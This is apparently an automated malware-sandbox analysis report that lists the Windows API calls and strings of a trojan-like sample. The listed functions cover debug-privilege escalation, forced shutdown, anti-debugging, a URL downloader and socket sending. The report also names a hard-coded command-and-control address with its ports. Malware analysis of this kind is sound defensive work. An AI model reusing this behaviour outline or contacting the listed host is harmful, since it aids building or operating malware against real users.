                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: swprintf$_memset
                                                                                                  • String ID: :$@
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID: swprintf$_memset
                                                                                                  • String ID: :$@
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,02D078FC), ref: 02D07756
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,02D078FC,?,?,?,?,?,?,76F90630), ref: 02D0775D
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 02D07785
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 02D077B9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                  • String ID: SeDebugPrivilege
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 02D1131C
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02D11331
                                                                                                  • UnhandledExceptionFilter.KERNEL32(02D225B8), ref: 02D1133C
                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 02D11358
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 02D1135F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 2579439406-0
                                                                                                  • Opcode ID: 4473d149b15df6103430fba789e42b054a7068b680ba82f61b8fb00446ab5022
                                                                                                  • Instruction ID: ad967e6bd707c3099400ddbd5f34643d619c0cc1199e907d32c966b3cae7124f
                                                                                                  • Opcode Fuzzy Hash: 4473d149b15df6103430fba789e42b054a7068b680ba82f61b8fb00446ab5022
                                                                                                  • Instruction Fuzzy Hash: A921E4B5C84300DFD764DF29F188A443BB0BB68710F526C1AE90882B90DB715DA8DF65
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0097793D
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00977952
                                                                                                  • UnhandledExceptionFilter.KERNEL32(00985350), ref: 0097795D
                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00977979
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00977980
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 2579439406-0
                                                                                                  • Opcode ID: ff4865731b6c7e501e33fd0115246c6003a2c34bceeea123202fa20362be66fa
                                                                                                  • Instruction ID: 62972c1bb58a2405cfc9b0707e50c114ec745767bc8e4562ec371860310db965
                                                                                                  • Opcode Fuzzy Hash: ff4865731b6c7e501e33fd0115246c6003a2c34bceeea123202fa20362be66fa
                                                                                                  • Instruction Fuzzy Hash: 5A21E2B583C200DFE701DF6AFD496583BA5FB08754F44501BE58987360EBB89984EF02
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D07B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                    • Part of subcall function 02D07B70: OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                    • Part of subcall function 02D07B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                    • Part of subcall function 02D07B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                    • Part of subcall function 02D07B70: GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BE0
                                                                                                  • ExitWindowsEx.USER32(00000005,00000000), ref: 02D0B471
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 681424410-0
                                                                                                  • Opcode ID: 22c935f8f0492920b6ae4717bd32cffcd332ee05ee3803e0b4884722ceac27a6
                                                                                                  • Instruction ID: 4774fee989572520f166aa6b370e4e4d2cdff200d76e52c36c59cada48c23586
                                                                                                  • Opcode Fuzzy Hash: 22c935f8f0492920b6ae4717bd32cffcd332ee05ee3803e0b4884722ceac27a6
                                                                                                  • Instruction Fuzzy Hash: 1AC08C3238010002E22432B47866B6AF341DB94322F01042FAB0E8C2D00C52ACA489B6
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D07B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                    • Part of subcall function 02D07B70: OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                    • Part of subcall function 02D07B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                    • Part of subcall function 02D07B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                    • Part of subcall function 02D07B70: GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BE0
                                                                                                  • ExitWindowsEx.USER32(00000004,00000000), ref: 02D0B429
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 681424410-0
                                                                                                  • Opcode ID: 70a326e440a774401d790389530aea1758caa5e78f6ce6af221ecf998542b6dd
                                                                                                  • Instruction ID: 6cd5b449536373880b5f0cdd04caa185a99c64d4a76ebc91112c79f965ca83ac
                                                                                                  • Opcode Fuzzy Hash: 70a326e440a774401d790389530aea1758caa5e78f6ce6af221ecf998542b6dd
                                                                                                  • Instruction Fuzzy Hash: 69C08C3238010006E22433B47866B69F341DB94322F00042BAB0E8C2D00C62ACA485BA
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D07B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                    • Part of subcall function 02D07B70: OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                    • Part of subcall function 02D07B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                    • Part of subcall function 02D07B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                    • Part of subcall function 02D07B70: GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BE0
                                                                                                  • ExitWindowsEx.USER32(00000006,00000000), ref: 02D0B44D
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 681424410-0
                                                                                                  • Opcode ID: 265df35d8b27238a0d2bdb8eff34310ded7da8e00aab9ff70b09f8d050efe753
                                                                                                  • Instruction ID: 97d6e52a903cf6d06ad42d8f869744ab4192744d0f15e54e6c5239f85c7e4e75
                                                                                                  • Opcode Fuzzy Hash: 265df35d8b27238a0d2bdb8eff34310ded7da8e00aab9ff70b09f8d050efe753
                                                                                                  • Instruction Fuzzy Hash: 43C08C3238010002E22432B47866B6AF342DB94322F00042BAA0E8C2D00C53ACA485B6
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 02D0B586
                                                                                                  • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 02D0B596
                                                                                                  • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 02D0B5B3
                                                                                                  • _memset.LIBCMT ref: 02D0B5D4
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0B61B
                                                                                                  • _memset.LIBCMT ref: 02D0B63C
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0B72C
                                                                                                  • Sleep.KERNEL32(000007D0), ref: 02D0B737
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F756
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F770
                                                                                                    • Part of subcall function 02D0F707: __CxxThrowException@8.LIBCMT ref: 02D0F781
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                  • String ID: 8.217.85.20$8.217.85.20$8.217.85.20$9091$9092$9093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                  • API String ID: 1186799303-1244596247
                                                                                                  • Opcode ID: 03a14f952d7bcd69362e74d37ae2b2ddeae55ed7a4339272c51b1ac55f43aac4
                                                                                                  • Instruction ID: 78751146e183d4eb260e13da3cf25df78d8a26e1789fa84706dc8dfe6ae5b8b7
                                                                                                  • Opcode Fuzzy Hash: 03a14f952d7bcd69362e74d37ae2b2ddeae55ed7a4339272c51b1ac55f43aac4
                                                                                                  • Instruction Fuzzy Hash: A441D6717803107BF224A750BC87F5AB355DF65B19F604114FA067A3C1DAE0BD1D8ABA
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D1401C
                                                                                                  • __mtterm.LIBCMT ref: 02D14028
                                                                                                    • Part of subcall function 02D13CF1: DecodePointer.KERNEL32(00000009,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13D02
                                                                                                    • Part of subcall function 02D13CF1: TlsFree.KERNEL32(00000027,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13D1C
                                                                                                    • Part of subcall function 02D13CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D18D48
                                                                                                    • Part of subcall function 02D13CF1: _free.LIBCMT ref: 02D18D4B
                                                                                                    • Part of subcall function 02D13CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D18D72
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D1403E
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D1404B
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D14058
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D14065
                                                                                                  • TlsAlloc.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140B5
                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140D0
                                                                                                  • __init_pointers.LIBCMT ref: 02D140DA
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140EB
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140F8
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14105
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14112
                                                                                                  • DecodePointer.KERNEL32(Function_00013E75,?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14133
                                                                                                  • __calloc_crt.LIBCMT ref: 02D14148
                                                                                                  • DecodePointer.KERNEL32(00000000,?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14162
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D14174
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                  • API String ID: 3698121176-3819984048
                                                                                                  • Opcode ID: 2c80309c79c3b22abc7f993f2f13c0aa55d0e6b5be5193cf56ce52bc70b19b86
                                                                                                  • Instruction ID: 0fcd32c957ebbfd4937017d6da1b88a2d43fea7ad9ff297bf93e0ce2ab4eabc6
                                                                                                  • Opcode Fuzzy Hash: 2c80309c79c3b22abc7f993f2f13c0aa55d0e6b5be5193cf56ce52bc70b19b86
                                                                                                  • Instruction Fuzzy Hash: 3A319132E84310BFEB61AF75FC086153FA5EB54766B510A1AE810D3750EB318CA5EF50
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979ACE
                                                                                                  • __mtterm.LIBCMT ref: 00979ADA
                                                                                                    • Part of subcall function 009797A5: DecodePointer.KERNEL32(00000008,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 009797B6
                                                                                                    • Part of subcall function 009797A5: TlsFree.KERNEL32(00000025,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 009797D0
                                                                                                    • Part of subcall function 009797A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 0097C031
                                                                                                    • Part of subcall function 009797A5: _free.LIBCMT ref: 0097C034
                                                                                                    • Part of subcall function 009797A5: DeleteCriticalSection.KERNEL32(00000025,?,?,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 0097C05B
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00979AF0
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00979AFD
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00979B0A
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00979B17
                                                                                                  • TlsAlloc.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979B67
                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979B82
                                                                                                  • __init_pointers.LIBCMT ref: 00979B8C
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979B9D
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BAA
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BB7
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BC4
                                                                                                  • DecodePointer.KERNEL32(Function_00009929,?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BE5
                                                                                                  • __calloc_crt.LIBCMT ref: 00979BFA
                                                                                                  • DecodePointer.KERNEL32(00000000,?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979C14
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00979C26
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                  • API String ID: 3698121176-3819984048
                                                                                                  • Opcode ID: fbbbe8779bdab4fb6b2f981732d31e73f656ac712db2745ddcf526b65311ed13
                                                                                                  • Instruction ID: b474cabb6fb2e2c26403d1a3fc26e27572c1457b05ae6f955033bc173489585b
                                                                                                  • Opcode Fuzzy Hash: fbbbe8779bdab4fb6b2f981732d31e73f656ac712db2745ddcf526b65311ed13
                                                                                                  • Instruction Fuzzy Hash: 50319FB296C715ABCB21AF78EC0961A3FA4EB84764F1D451AF408C33B0EB348405EF40
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                                  • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                  • API String ID: 3970221696-33419044
                                                                                                  • Opcode ID: 9a5825c77f4b722d79db32689b318e233805ad7fb7879efd131882d8c81d0f5c
                                                                                                  • Instruction ID: c1b2fc06dce978e0177cc34d92fab5baf7feed202629db46752678c6b6f5c2c1
                                                                                                  • Opcode Fuzzy Hash: 9a5825c77f4b722d79db32689b318e233805ad7fb7879efd131882d8c81d0f5c
                                                                                                  • Instruction Fuzzy Hash: 5451EDB195031876DB30EB60DD89FEE7378DF54700F404595AA09A52D0EBB0DE88CFA5
                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 02D07CC3
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 02D07CD7
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02D07CF7
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 02D07D16
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02D07D53
                                                                                                  • _memset.LIBCMT ref: 02D07D7E
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02D07D8C
                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D07DDB
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07DF9
                                                                                                  • Sleep.KERNEL32(00000001), ref: 02D07E01
                                                                                                  • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02D07E0D
                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02D07E28
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                  • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                  • API String ID: 1463273941-1099148085
                                                                                                  • Opcode ID: 54ed9acea33c795fde60ba3a32756cefb6197cd39ad6bac79bc83e4827ba5325
                                                                                                  • Instruction ID: 97d1f43d4b2402b82f7a3833e05b86851a69ee6911ea4cb4a4c893a97d3d42b7
                                                                                                  • Opcode Fuzzy Hash: 54ed9acea33c795fde60ba3a32756cefb6197cd39ad6bac79bc83e4827ba5325
                                                                                                  • Instruction Fuzzy Hash: 0C417471A80228AAE7349B649C45FDAB3F8FF54700F11C5A5F645A62C0DE705E49CFE4
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000064), ref: 02D0455A
                                                                                                  • timeGetTime.WINMM ref: 02D0457B
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0459B
                                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D045BD
                                                                                                  • SwitchToThread.KERNEL32 ref: 02D045D7
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D04620
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D04644
                                                                                                  • send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D04668
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D04686
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D04691
                                                                                                  • WSACloseEvent.WS2_32(?), ref: 02D0469F
                                                                                                  • shutdown.WS2_32(?,00000001), ref: 02D046B3
                                                                                                  • closesocket.WS2_32(?), ref: 02D046BD
                                                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02D046F6
                                                                                                  • SetLastError.KERNEL32(000005B4), ref: 02D0470A
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0472B
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D04743
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1692523546-0
                                                                                                  • Opcode ID: 4df579e36734c8b2e01fc89a121476b97086f5480643761564537be45301f730
                                                                                                  • Instruction ID: 2d17144a41670773f379fe19ff99764984a7c8f2263d31a166974088511a9206
                                                                                                  • Opcode Fuzzy Hash: 4df579e36734c8b2e01fc89a121476b97086f5480643761564537be45301f730
                                                                                                  • Instruction Fuzzy Hash: C1919B70A00612ABC728DF64D8C8FAAB7A5FF54705F108519EA168B7A0D771FCA5CBD0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$swprintf$_malloc
                                                                                                  • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                  • API String ID: 1873853019-591889663
                                                                                                  • Opcode ID: 1e661cde7c9103053396c25c7d2d65cc05d35739ce12a908904b346bfd5135c4
                                                                                                  • Instruction ID: b1596ff9dd56110b986c26124b4d96ce41fbfcc148287c378189cc0b04ecca64
                                                                                                  • Opcode Fuzzy Hash: 1e661cde7c9103053396c25c7d2d65cc05d35739ce12a908904b346bfd5135c4
                                                                                                  • Instruction Fuzzy Hash: 3381DEB5A40300ABE720AB24ECC6F6A77A5EF55714F144064E9095F3D2EB71ED14CAF2
                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 02D05CD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
